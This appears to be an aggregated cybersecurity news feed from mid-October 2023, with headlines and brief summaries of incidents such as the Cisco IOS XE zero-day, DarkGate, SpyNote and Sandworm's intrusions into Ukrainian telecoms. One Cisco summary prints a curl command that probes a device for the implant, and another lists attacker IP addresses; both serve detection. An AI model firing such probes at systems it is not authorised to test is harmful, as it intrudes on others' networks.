            Cyber entities continue to show a persistent interest in targeting critical infrastructure by taking advantage of vulnerable OT assets. To counter this threat, NSA has released a repository for OT Intrusion Detection Signatures and Analytics to the NSA Cyber GitHub. The capability, known as ELITEWOLF, can enable defenders of critical infrastructure, defense industrial base, and national security systems to identify and detect potentially malicious cyber activity in their OT environments. These signatures/analytics aren’t necessarily malicious … More

            The post ELITEWOLF: NSA’s repository of signatures and analytics to secure OT appeared first on Help Net Security.

            "



            Cyberattacks on healthcare organizations affect patient care

            ciber
            2023-10-17 https://www.helpnetsecurity.com/2023/10/17/healthcare-organizations-cyberattacks/

            88% of organizations experienced an average of 40 attacks in the past 12 months, according to a survey conducted by Proofpoint and the Ponemon Institute. Supply chain attacks: leading patient care risk. The average total cost of a cyberattack experienced by healthcare organizations was $4.99 million, a 13% increase from the previous year. Among the organizations that suffered the four most common types of attacks (cloud compromise, ransomware, supply chain, and BEC), an average of … More

            The post Cyberattacks on healthcare organizations affect patient care appeared first on Help Net Security.

            "



            CERT-UA Reports: 11 Ukrainian Telecom Providers Hit by Cyberattacks

            ciber Telcos
            2023-10-17 https://thehackernews.com/2023/10/cert-ua-reports-11-ukrainian-telecom.html
            The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that threat actors "interfered" with at least 11 telecommunication service providers in the country between May and September 2023. The agency is tracking the activity under the name UAC-0165, stating the intrusions led to service interruptions for customers. The starting point of the attacks is a reconnaissance phase in "



            Warning: Unpatched Cisco Zero-Day Vulnerability Actively Targeted in the Wild

            exploits
            2023-10-17 https://thehackernews.com/2023/10/warning-unpatched-cisco-zero-day.html
            Cisco has warned of a critical, unpatched security flaw impacting IOS XE software that’s under active exploitation in the wild. Rooted in the web UI feature, the zero-day vulnerability is assigned as CVE-2023-20198 and has been given the maximum severity rating of 10.0 on the CVSS scoring system. It’s worth pointing out that the shortcoming only affects enterprise networking gear that has "

            Autosummary: The backdoor, saved under the file path "/usr/binos/conf/nginx-conf/cisco_service.conf," is not persistent, meaning it will not survive a device reboot. "


            Malware-laced ‘RedAlert – Rocket Alerts’ app targets Israeli users

            exploits
            2023-10-17 https://securityaffairs.com/152569/malware/redalert-rocket-alerts-spyware.html

            Threat actors are targeting Israeli Android users with a malicious version of the ‘RedAlert – Rocket Alerts’ app that hides spyware. A threat actor is targeting Israeli Android users with a spyware-laced version of the ‘RedAlert – Rocket Alerts’ app, Cloudflare warns. RedAlert – Rocket Alerts is a mobile app that provides real-time alerts about incoming […]

            The post Malware-laced ‘RedAlert – Rocket Alerts’ app targets Israeli users appeared first on Security Affairs.

            "

            Autosummary: Users who have installed RedAlert on their devices can determine whether they have been compromised by checking for extraneous permissions, such as Call Logs, Contacts, Phone, and SMS. "


            Researchers warn of increased malware delivery via fake browser updates

            exploits
            2023-10-17 https://www.helpnetsecurity.com/2023/10/17/clearfake-malware-fake-browser-updates/

            ClearFake, a recently documented threat leveraging compromised WordPress sites to push malicious fake browser updates, is likely operated by the threat group behind the SocGholish “malware delivery via fake browser updates” campaigns, Sekoia researchers have concluded. About ClearFake: ClearFake is the name given by researcher Randy McEoin to a malware delivery campaign he outlined in August 2023. “The name is a reference to the majority of the Javascript being used without obfuscation,” he explained. The … More

            The post Researchers warn of increased malware delivery via fake browser updates appeared first on Help Net Security.

            "

            Autosummary: According to Proofpoint researchers, the fake update pages are served in different languages (English, French, German, Spanish, and Portuguese), depending on the language set in the user’s browser. "


            Ransomware realities in 2023: one employee mistake can cost a company millions

            exploits
            2023-10-17 https://securityaffairs.com/152603/cyber-crime/ransomware-attack-economic-impact.html

            What is the impact of ransomware on organizations? One employee’s mistake can cost a company millions of dollars. Studies show that human error is the root cause of more than 80% of all cyber breaches, whether malicious or unintended. The recent debilitating cyberattacks on casino and resort giants MGM and Caesars are no exception. How […]

            The post Ransomware realities in 2023: one employee mistake can cost a company millions appeared first on Security Affairs.

            "

            Autosummary: What is the impact of ransomware on organizations? With 85% of campaigns targeting victims with phishing emails containing malicious links, another form of social engineering attack, education and cyber vigilance remain a high priority. MGM has revealed that the September 11th attack, which forced an entire system shutdown, impacting all guest services and emptying casino floors for nearly a week, will cost the company upwards of $100 million in 3rd quarter profits. "


            Fighting off cyberattacks? Make sure user credentials aren’t compromised

            ciber
            2023-10-17 https://www.bleepingcomputer.com/news/security/fighting-off-cyberattacks-make-sure-user-credentials-arent-compromised/
            Login credential theft presents one of the biggest and most enduring cybersecurity problems. This article by Specops Software looks at the motivations driving credential theft and the tactics bad actors are likely to use. [...] "

            Autosummary: Most people (51%) admit to reusing the same login credentials across multiple sites, so if bad actors can successfully access one set of credentials, they can likely access multiple bank accounts, credit cards, emails, and more. So, for example, if your end user decides to use their ultra-secure 20-character Hulu password as the password for their corporate email account, your security is at risk. Motives for credential theft: the dark web is filled with cybercriminals interested in selling stolen data to the highest bidder, such as social security numbers, sensitive corporate data, passwords, or credit card information. "


            BackBox Network Vulnerability Manager identifies vulnerabilities and classifies them by threat level

            exploits
            2023-10-17 https://www.helpnetsecurity.com/2023/10/17/backbox-network-vulnerability-manager/

            BackBox launched Network Vulnerability Manager (NVM). With this new capability added to its existing Network Automation Platform, BackBox integrates automated OS upgrades and network configuration management capabilities with network vulnerability management into common workflows. NVM is purpose-built for network teams to easily discover vulnerabilities in their network, prioritize CVEs according to their unique risk profile, and automate multiple levels of remediation, no matter the network complexity. According to a Ponemon Institute study on the Costs … More

            The post BackBox Network Vulnerability Manager identifies vulnerabilities and classifies them by threat level appeared first on Help Net Security.

            "

            Autosummary: With the addition of NVM, the platform now offers network teams a comprehensive vulnerability management process that: identifies vulnerabilities and classifies them by threat level as they surface; prioritizes them according to the needs of each customer’s unique network environment; automates multiple levels of remediation through configuration changes, network and firewall OS upgrades, and patches; simplifies OS and firmware updates with built-in backups, single-click roll-backs, and integrated pre- and post-update validations; and helps network teams with device lifecycle management and automates hardware upgrades around vendor-driven EOL (End of Life) data. “Manual processes have become obsolete. "


            Webinar: Locking Down Financial and Accounting Data — Best Data Security Strategies

            financial
            2023-10-17 https://thehackernews.com/2023/10/webinar-locking-down-financial-and.html
            Financial data is much more than just a collection of numbers; it is a crucial component of any business and a prime target for cybercriminals. It's important to understand that financial records can be a veritable treasure trove for digital pirates. A security breach not only puts customers' personal information in jeopardy but also enables fraudsters to drain company funds and exploit clients. "

            Autosummary: Highlights of the Webinar: Beware the Sirens: Learn to identify and avoid common tactics targeting your finances. "


            Russia-linked Sandworm APT compromised 11 Ukrainian telecommunications providers

            Telcos
            2023-10-17 https://securityaffairs.com/152617/apt/sandworm-ukraine-telecommunication-service.html

            Russia-linked APT group Sandworm has hacked eleven telecommunication service providers in Ukraine since May 2023. The Russia-linked APT group Sandworm (UAC-0165) has compromised eleven telecommunication service providers in Ukraine between May and September 2023, reported Ukraine’s Computer Emergency Response Team (CERT-UA). According to public sources, the threat actors targeted ICS of at least […]

            The post Russia-linked Sandworm APT compromised 11 Ukrainian telecommunications providers appeared first on Security Affairs.

            "

            Autosummary: In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. "


            Venezuela crisis: Government and opposition to resume talks

            government
            2023-10-17 https://www.bbc.co.uk/news/world-latin-america-67132958?at_medium=RSS&at_campaign=KARANGA
            The two sides are reportedly close to signing a deal on conditions under which to hold elections in 2024. "



            Hotels turn to tech as bedbug outbreaks rise

            exploits
            2023-10-17 https://www.bbc.co.uk/news/business-67123305?at_medium=RSS&at_campaign=KARANGA
            Firms are turning to tech - both old and new - to catch outbreaks early, which is vital to stopping the spread. "



            D-Link confirms data breach after employee phishing attack

            financial
            2023-10-17 https://www.bleepingcomputer.com/news/security/d-link-confirms-data-breach-after-employee-phishing-attack/
            Taiwanese networking equipment manufacturer D-Link confirmed a data breach linked to information stolen from its network and put up for sale on BreachForums earlier this month. [...] "

            Autosummary: Data stolen from a "test lab" system. D-Link said the security breach occurred due to an employee falling victim to a phishing attack, granting the attacker access to the company's network. "


            SpyNote Android malware spreads via fake volcano eruption alerts

            exploits
            2023-10-17 https://www.bleepingcomputer.com/news/security/spynote-android-malware-spreads-via-fake-volcano-eruption-alerts/
            Android malware "SpyNote" was seen in an Italy-focused campaign that uses a phony "IT-alert" public alert service website to infect visitors. [...] "



            Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure

            government
            2023-10-17 https://thehackernews.com/2023/10/discord-playground-for-nation-state.html
            In what's the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray in leveraging the social platform for targeting critical infrastructure. Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as "

            Autosummary: Trellix's analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that utilize Discord's CDN to download a next-stage payload, including stealers like RedLine, Vidar, Agent Tesla, and Umbral. "


            CVE-2023-20198 zero-day widely exploited to install implants on Cisco IOS XE systems

            exploits
            2023-10-17 https://securityaffairs.com/152626/hacking/cve-2023-20198-cisco-ios-xe-devices.html

            Threat actors exploited the recently disclosed zero-day flaw (CVE-2023-20198) in a large-scale hacking campaign on Cisco IOS XE devices. Threat actors have exploited the recently disclosed critical zero-day vulnerability (CVE-2023-20198) to compromise thousands of Cisco IOS XE devices, security firm VulnCheck warns. Cisco this week warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), […]

            The post CVE-2023-20198 zero-day widely exploited to install implants on Cisco IOS XE systems appeared first on Security Affairs.

            "

            Autosummary: Threat actors exploited the recently disclosed zero-day flaw (CVE-2023-20198) in a large-scale hacking campaign on Cisco IOS XE devices. “This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.” "


            KwikTrip all but says IT outage was caused by a cyberattack

            ciber
            2023-10-17 https://www.bleepingcomputer.com/news/security/kwiktrip-all-but-says-it-outage-was-caused-by-a-cyberattack/
            Kwik Trip has released another statement on an ongoing outage, all but confirming it suffered a cyberattack that has led to IT system disruptions. [...] "

            Autosummary: Kwik Trip is a US chain of over 800 convenience stores and gas stations in Michigan, Minnesota, and Wisconsin, also operating under the name Kwik Star in Illinois, Iowa, and South Dakota. "


            Over 10,000 Cisco devices hacked in IOS XE zero-day attacks

            exploits
            2023-10-17 https://www.bleepingcomputer.com/news/security/over-10-000-cisco-devices-hacked-in-ios-xe-zero-day-attacks/
            Attackers have exploited a recently disclosed critical zero-day bug to compromise and infect more than 10,000 Cisco IOS XE devices with malicious implants. [...] "

            Autosummary: "This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks," said VulnCheck CTO Jacob Baines. "


            The US wants governments to commit to not paying ransoms

            government
            2023-10-17 https://www.malwarebytes.com/blog/news/2023/10/the-us-is-looking-for-international-boycot-against-ransomware

            Categories: News

            Categories: Ransomware

            The US is pushing member countries of the Counter Ransomware Initiative to stop paying ransoms to cybercriminals.


            The post The US wants governments to commit to not paying ransoms appeared first on Malwarebytes Labs.

            "

            Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. “The work of the CRI supports the implementation of the endorsed UN framework for responsible state behavior in cyberspace, specifically the voluntary norm that States should cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats.” White House Deputy National Security Adviser Anne Neuberger said ransomware payment bans have been a topic of discussion among members of the CRI, and she noted that several other countries have also raised the issue, but no decisions have been made. "


            Signal says there is no evidence rumored zero-day bug is real

            exploits
            2023-10-16 https://www.bleepingcomputer.com/news/security/signal-says-there-is-no-evidence-rumored-zero-day-bug-is-real/
            Signal messenger has investigated rumors spreading online over the weekend of a zero-day security vulnerability related to the "Generate Link Previews" feature, stating that there is no evidence this vulnerability is real. [...] "



            Inadequate IoT protection can be a costly mistake

            industry
            2023-10-16 https://www.helpnetsecurity.com/2023/10/16/iot-security-strategy/

            97% of organizations are struggling to secure their IoT and connected products to some degree, according to Keyfactor. The research survey also found that 98% of organizations experienced certificate outages in the last 12 months, costing an average of over $2.25 million. “Organizations worldwide are under mounting pressure to ensure their IoT and connected devices are protected while navigating an increasingly complex digital landscape that requires complete trust,” said Ellen Boehm, SVP, IoT Strategies and … More

            The post Inadequate IoT protection can be a costly mistake appeared first on Help Net Security.

            "

            Autosummary: 88% of organizations agree that improvements are needed in the security of IoT and connected products in use within their organization, with 37% of respondents reporting that significant improvement is needed and 60% reporting that some improvement is needed. "


            Binance's Smart Chain Exploited in New "EtherHiding" Malware Campaign

            exploits
            2023-10-16 https://thehackernews.com/2023/10/binances-smart-chain-exploited-in-new.html
            Threat actors have been observed serving malicious code by utilizing Binance's Smart Chain (BSC) contracts in what has been described as the "next level of bulletproof hosting." The campaign, detected two months ago, has been codenamed EtherHiding by Guardio Labs. The novel twist marks the latest iteration in an ongoing campaign that leverages compromised WordPress sites to serve unsuspecting "



            Signal Debunks Zero-Day Vulnerability Reports, Finds No Evidence

            exploits
            2023-10-16 https://thehackernews.com/2023/10/signal-debunks-zero-day-vulnerability.html
            Encrypted messaging app Signal has pushed back against "viral reports" of an alleged zero-day flaw in its software, stating it found no evidence to support the claim. "After responsible investigation *we have no evidence that suggests this vulnerability is real* nor has any additional info been shared via our official reporting channels," it said in a series of messages posted in X (formerly "

            Autosummary: "Spyware operators can also use this interface to initiate attack attempts against a target phone, and if successful, to retrieve and access sensitive information including photos, location data, chat messages, and microphone recordings from the infected device. "


            Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm

            exploits ransomware industry
            2023-10-16 https://securityaffairs.com/152501/malware/akira-ransomware-attack-blocked.html

            Microsoft thwarted a large-scale hacking campaign carried out by Akira ransomware operators targeting an unknown industrial organization. Microsoft announced that its Microsoft Defender for Endpoint helped to block a large-scale hacking campaign carried out by Akira ransomware operators (tracked by Microsoft as Storm-1567). The attack took place in early June 2023 and aimed at an industrial engineering […]

            The post Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm appeared first on Security Affairs.

            "

            Autosummary: “This is why, as announced today, we added user containment to the automatic attack disruption capability in Microsoft Defender for Endpoint, a unique and innovative defense mechanism that stops human-operated attacks in their tracks.” "


            DarkGate malware campaign abuses Skype and Teams

            exploits
            2023-10-16 https://securityaffairs.com/152513/cyber-crime/darkgate-campaign-messaging-platforms.html

            Researchers uncovered an ongoing campaign abusing the popular messaging platforms Skype and Teams to distribute the DarkGate malware. From July to September, researchers from Trend Micro observed a malicious DarkGate campaign abusing instant messaging platforms to deliver a VBA loader script to victims. The threat actors abused popular messaging platforms such as Skype and Teams […]

            The post DarkGate malware campaign abuses Skype and Teams appeared first on Security Affairs.

            "

            Autosummary: DarkGate capabilities include: self-update and self-manage; implement remote access software (such as remote desktop protocol or RDP, hidden virtual network computing or hVNC, and AnyDesk); and enable cryptocurrency mining functionality (start, stop, and configure). "


            Signal debunks online rumours of zero-day security vulnerability

            exploits
            2023-10-16 https://www.bitdefender.com/blog/hotforsecurity/signal-debunks-online-rumours-of-zero-day-security-vulnerability/
            Over the weekend rumours circulated on social networks of an unpatched security hole in the Signal messaging app that could allow a remote hacker to seize control of your smartphone. But were they true? Read more in my article on the Hot for Security blog. "

            Autosummary: Even if there isn't a zero-day vulnerability in Signal as the online rumours described, it still makes sense to practice safe computing, ensure that your privacy settings are configured as you expect them to be, and that you are ensuring that your apps are properly updated. "


            Compromised Skype accounts deliver DarkGate malware to employees

            exploits
            2023-10-16 https://www.helpnetsecurity.com/2023/10/16/darkgate-malware-skype/

            A threat actor is using compromised Skype accounts to deliver the DarkGate malware to target organizations, Trend Micro researchers have warned. “Versions of DarkGate have been advertised on the Russian-language forum eCrime since May 2023. Since then, an increase in the number of initial entry attacks using the malware has been observed,” they noted. DarkGate malware comes via Skype and Teams: the threat actor leverages compromised Skype accounts to contact employees at target organizations by … More

            The post Compromised Skype accounts deliver DarkGate malware to employees appeared first on Help Net Security.

            "

            Autosummary: First documented in late 2017, DarkGate is loader malware that can execute discovery commands, implement (legitimate) remote access software, log keystrokes, steal information stored by browsers, and more. “DarkGate also uses a Windows-specific automation and scripting tool called AutoIt to deliver and execute its malicious capabilities. "


            Microsoft announces AI bug bounty program

            exploits
            2023-10-16 https://www.helpnetsecurity.com/2023/10/16/microsoft-ai-bug-bounty/

            Microsoft is offering up to $15,000 to bug hunters that pinpoint vulnerabilities of Critical or Important severity in its AI-powered “Bing experience”. “The new Microsoft AI bounty program comes as a result of key investments and learnings over the last few months, including an AI security research challenge and an update to Microsoft’s vulnerability severity classification for AI systems,” says Lynn Miyashita, a technical program manager with the Microsoft Security Response Center. The Microsoft AI … More

            The post Microsoft announces AI bug bounty program appeared first on Help Net Security.

            "



            Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign

            exploits rusia-ucrania
            2023-10-16 https://thehackernews.com/2023/10/pro-russian-hackers-exploiting-recent.html
            Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems. "The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as "

            Autosummary: "In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), [and] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said. "


            SpyNote: Beware of This Android Trojan that Records Audio and Phone Calls

            exploits
            2023-10-16 https://thehackernews.com/2023/10/spynote-beware-of-this-android-trojan.html
            The Android banking trojan known as SpyNote has been dissected to reveal its diverse information-gathering features. Typically spread via SMS phishing campaigns, attack chains involving the spyware trick potential victims into installing the app by clicking on the embedded link, according to F-Secure. Besides requesting invasive permissions to access call logs, camera, SMS messages, and external


            Signal denies claims of an alleged zero-day flaw in its platform

            exploits
            2023-10-16 https://securityaffairs.com/152539/hacking/signal-denies-0day-claims.html

            Encrypted messaging app Signal denied claims of an alleged zero-day flaw in its platform after a responsible investigation. The popular encrypted messaging app Signal denied claims of an alleged zero-day vulnerability in its platform. The company launched an investigation into the claims after they have seen the vague viral reports alleging a zero-day vulnerability. “PSA: […]

            The post Signal denies claims of an alleged zero-day flaw in its platform appeared first on Security Affairs.

            "

            Autosummary: Signal denies claims of an alleged zero-day flaw in its platform Pierluigi Paganini October 16, 2023 October 16, 2023 Encrypted messaging app Signal denied claims of an alleged zero-day flaw in its platform after a responsible investigation. "


            Russian Sandworm hackers breached 11 Ukrainian telcos since May

            rusia-ucrania Telcos
            2023-10-16 https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-breached-11-ukrainian-telcos-since-may/
            The state-sponsored Russian hacking group tracked as "Sandworm" has compromised eleven telecommunication service providers in Ukraine between May and September 2023. [...]

            Autosummary: Additionally, the attackers use tools like "ffuf", "dirbuster", "gowitness", and "nmap" to find potential vulnerabilities in web services that can be exploited to gain access.


            Cisco warns of new IOS XE zero-day actively exploited in attacks

            exploits
            2023-10-16 https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/
            Cisco warned admins today of a new and maximum severity zero-day vulnerability in its IOS XE Software that can let attackers gain full administrator privileges and take complete control of affected routers. [...]

            Autosummary: One approach to detecting the presence of the malicious implant on compromised Cisco IOS XE devices involves running the following command against the device, where the placeholder "DEVICEIP" represents the IP address under investigation:

            curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1"

            "We are working non-stop to provide a software fix and we strongly urge customers to take immediate action as outlined in the security advisory."


            Discord still a hotbed of malware activity — Now APTs join the fun

            exploits
            2023-10-16 https://www.bleepingcomputer.com/news/security/discord-still-a-hotbed-of-malware-activity-now-apts-join-the-fun/
            Discord continues to be a breeding ground for malicious activity by hackers and now APT groups, with it commonly used to distribute malware, exfiltrate data, and targeted by threat actors to steal authentication tokens. [...]

            Autosummary: (Figure: Payloads dropped via the CDN system. Source: Trellix) Regarding the abuse of Discord webhooks for data theft from the victim's device, Trellix says the following 17 families have applied the practice since August 2021: MercurialGrabber, AgentTesla, UmbralStealer, Stealerium, Sorano, zgRAT, SectopRAT, NjRAT, Caliber44Stealer, InvictaStealer, StormKitty, TyphonStealer, DarkComet, VenomRAT, GodStealer, NanocoreRAT, and GrowtopiaStealer. These malware families will collect credentials, browser cookies, cryptocurrency wallets, and other data from infected systems, and then upload them to a Discord server using webhooks.


            Hackers exploit critical flaw in WordPress Royal Elementor plugin

            exploits
            2023-10-16 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-flaw-in-wordpress-royal-elementor-plugin/
            A critical severity vulnerability impacting Royal Elementor Addons and Templates up to version 1.3.78 is reported to be actively exploited by two WordPress security teams. [...]

            Autosummary: Exploited to create rogue admin accounts: Two WordPress security firms, Wordfence and WPScan (Automattic), have marked CVE-2023-5360 as actively exploited since August 30, 2023, with the attack volume ramping up starting on October 3, 2023.


            Cisco IOS XE zero-day exploited by attackers to deliver implant (CVE-2023-20198)

            exploits
            2023-10-16 https://www.helpnetsecurity.com/2023/10/16/cve-2023-20198/

            A previously unknown vulnerability (CVE-2023-20198) affecting networking devices running Cisco IOS XE software is being exploited by a threat actor to take control of the devices and install an implant, Cisco Talos researchers have warned today. About CVE-2023-20198 CVE-2023-20198 is a privilege escalation vulnerability in the web UI feature of Cisco IOS XE software, which is installed on various Cisco controllers, switches, edge, branch and virtual routers. The web UI is an embedded GUI-based tool … More

            The post Cisco IOS XE zero-day exploited by attackers to deliver implant (CVE-2023-20198) appeared first on Help Net Security.

            "

            Autosummary: About CVE-2023-20198 CVE-2023-20198 is a privilege escalation vulnerability in the web UI feature of Cisco IOS XE software, which is installed on various Cisco controllers, switches, edge, branch and virtual routers. "


            Cisco warns of active exploitation of IOS XE zero-day

            exploits
            2023-10-16 https://securityaffairs.com/152552/hacking/cisco-ios-xe-zero-day.html

            Cisco warned customers of a critical zero-day vulnerability in its IOS XE Software that is actively exploited in attacks. Cisco warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. The IT giant found the vulnerability during the resolution of multiple Technical Assistance […]

            The post Cisco warns of active exploitation of IOS XE zero-day appeared first on Security Affairs.

            "

            Autosummary: ⚠ CVSS: 10 ❌ Fixes : not available Related to the attack: 5.149.249[.]74 154.53.56[.]231 Cisco provided some way to check if the system might be compromised 1/2 — CERT Orange Cyberdefense (@CERTCyberdef) October 16, 2023 Cisco Talos researchers first spotted attacks exploiting the flaw on September 28, 2023. "


            Week in review: Patched curl and libcurl vulnerability, 15 free M365 security training modules

            exploits
            2023-10-15 https://www.helpnetsecurity.com/2023/10/15/week-in-review-patched-curl-and-libcurl-vulnerability-15-free-m365-security-training-modules/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Turning military veterans into cybersecurity experts In this Help Net Security interview, James Murphy, the Director of the TechVets Programme at the Forces Employment Charity and member of Fortinet’s Veterans Program Advisory Council, discusses the challenges that military veterans face when transitioning from military to civilian life. Unmasking the limitations of yearly penetration tests In this Help Net Security interview, … More

            The post Week in review: Patched curl and libcurl vulnerability, 15 free M365 security training modules appeared first on Help Net Security.

            "

            Autosummary: Microsoft fixes exploited WordPad, Skype for Business zero-days (CVE-2023-36563, CVE-2023-41763) On this October 2023 Patch Tuesday, Microsoft has released 103 patches and has fixed three actively exploited vulnerabilities (CVE-2023-36563, CVE-2023-41763, CVE-2023-44487). "


            Steam enforces SMS verification to curb malware-ridden updates

            exploits
            2023-10-15 https://www.bleepingcomputer.com/news/security/steam-enforces-sms-verification-to-curb-malware-ridden-updates/
            Valve has announced implementing additional security measures for developers publishing games on Steam, including SMS-based confirmation codes. This is to deal with a recent outbreak of malicious updates pushing malware from compromised publisher accounts. [...]

            Autosummary: It supports DRM (digital rights management), multiplayer, video streaming, matchmaking, achievements system, in-game voice and chat, microtransactions, statistics, cloud saving, and community-made content sharing (Steam Workshop).


            Women Political Leaders Summit targeted in RomCom malware phishing

            financial exploits
            2023-10-15 https://www.bleepingcomputer.com/news/security/women-political-leaders-summit-targeted-in-romcom-malware-phishing/
            A new, lightweight variant of the RomCom backdoor was deployed against participants of the Women Political Leaders (WPL) Summit in Brussels, a summit focusing on gender equality and women in politics. [...]

            Autosummary: (Figure: XOR-encrypted payload. Source: Trend Micro) RomCom 4.0: Trend Micro identifies the latest, stripped-down variant of RomCom as the fourth major release of the backdoor, explaining that it's the same malware Volexity researchers recently named "Peapod." Targeting women political leaders: In August 2023, Void Rabisu set up a malicious website on the address "wplsummit[.]com", designed to imitate the real Women Political Leaders (WPL) website hosted on wplsummit.org. (Figure: Fake WPL Summit website. Source:


            The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital

            exploits ransomware
            2023-10-15 https://securityaffairs.com/152486/cyber-crime/alphv-ransomware-morrison-community-hospital.html

            The Alphv ransomware group added the Morrison Community Hospital to its dark web leak site. Threat actors continue to target hospitals. The ALPHV/BlackCat ransomware group claims to have hacked the Morrison Community Hospital and added it to its dark web Tor leak site. The group claims to have stolen 5TB of patients’ and employees’ information, […]

            The post The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital appeared first on Security Affairs.

            "

            Autosummary: The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital Pierluigi Paganini October 15, 2023 October 15, 2023 The Alphv ransomware group added the Morrison Community Hospital to its dark web leak site. "


            Ubuntu discovers "hate speech" in release 23.10 — how to upgrade?

            Linux
            2023-10-14 https://www.bleepingcomputer.com/news/security/ubuntu-discovers-hate-speech-in-release-2310-how-to-upgrade/
            Ubuntu, the most popular Linux distribution, has pulled its Desktop release 23.10 after its Ukrainian translations were discovered to contain hate speech. According to the Ubuntu project, a malicious contributor is behind anti-Semitic, homophobic, and xenophobic slurs that were injected into the distro via a "third party tool." [...]

            Autosummary: Furthermore, dependencies, code, and open source components may undergo a separate validation process, aimed at thwarting malware, than the one suited for translations, making incidents like these harder to discover. "I trust Ubuntu because it's the most widely used so it should have the best review team, but if this happened with translations and no one saw, imagine with dependencies with malware injected," posted a user on X (formerly Twitter).


            CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks

            exploits ransomware
            2023-10-14 https://securityaffairs.com/152457/breaking-news/cisa-kev-ransomware-attacks.html

            CISA warns organizations of vulnerabilities and misconfigurations that are known to be exploited in ransomware operations. The US cybersecurity agency CISA is sharing knowledge about vulnerabilities and misconfigurations exploited in ransomware attacks. The initiative is part of its Ransomware Vulnerability Warning Pilot (RVWP) program which launched this year. The US Agency is sharing this information […]

            The post CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks appeared first on Security Affairs.

            "

            Autosummary: CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks Pierluigi Paganini October 14, 2023 October 14, 2023 CISA warns organizations of vulnerabilities and misconfigurations that are known to be exploited in ransomware operations. "


            Lockbit ransomware gang demanded an 80 million ransom to CDW

            exploits ransomware
            2023-10-14 https://securityaffairs.com/152470/cyber-crime/lockbit-ransomware-gang-hacked-cdw.html

            The Lockbit ransomware gang claims to have hacked the technology services giant CDW and threatens to leak the stolen data. The technology services giant CDW announced it has launched an investigation into claims made by the Lockbit ransomware gang that added the company to the list of victims on its leak site. CDW Corporation is […]

            The post Lockbit ransomware gang demanded an 80 million ransom to CDW appeared first on Security Affairs.

            "

            Autosummary: A secondary division of the company, known as CDW-G, focuses on United States governmental entities, including as K-12 schools, universities, non-profit healthcare organizations, State & Local and the Federal government. "


            What does TikTok's EGX sponsorship mean for the games industry?

            industry
            2023-10-14 https://www.bbc.co.uk/news/newsbeat-67099348?at_medium=RSS&at_campaign=KARANGA
            The app's hoping to take on Twitch and YouTube to become the main stop for online video games content.


            Wales 17-29 Argentina: Pumas seal World Cup semi-final spot with victory in Marseille

            latam
            2023-10-14 https://www.bbc.co.uk/sport/rugby-union/67111823?at_medium=RSS&at_campaign=KARANGA
            Argentina ended Wales' World Cup journey in controversial fashion during an enthralling quarter-final in Marseille.

            Autosummary: Line-ups. Wales: L Williams; Rees-Zammit, North, Tompkins, Adams; Biggar, G Davies; G Thomas, Elias, Francis, Rowlands, Beard, Morgan (capt), Reffell, Wainwright. Replacements: Lake, Domachowski, D Lewis, D Jenkins, Tshiunza, T Williams, Costelow, Dyer. Argentina: Mallia; Boffelli, Cinti, Chocobares, M Carreras; S Carreras, Cubelli; Gallo, Montoya (capt), Gomez Kodela, Petti, Lavanini, Gonzalez, Kremer, Isa. Replacements: Creevy, Sclavi, Bello, Alemanno, Bruni, Bazan Velez, Sanchez, Moroni.


            DarkGate malware spreads through compromised Skype accounts

            exploits
            2023-10-14 https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/
            Between July and September, DarkGate malware attacks have used compromised Skype accounts to infect targets through messages containing VBA loader script attachments. [...]

            Autosummary: The malware was touted to offer a wide range of features, including a concealed VNC, capabilities to bypass Windows Defender, a browser history theft tool, an integrated reverse proxy, a file manager, and a Discord token stealer.


            Stronger ransomware protection finally pays off

            exploits ransomware
            2023-10-13 https://www.helpnetsecurity.com/2023/10/13/ransomware-protection-awareness/

